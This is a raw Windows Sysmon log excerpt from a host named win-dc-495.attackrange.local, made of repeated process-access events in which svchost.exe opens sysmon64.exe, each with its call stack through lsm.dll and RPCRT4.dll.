13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001363Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.377{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001352Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001351Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001350Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:15.361{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
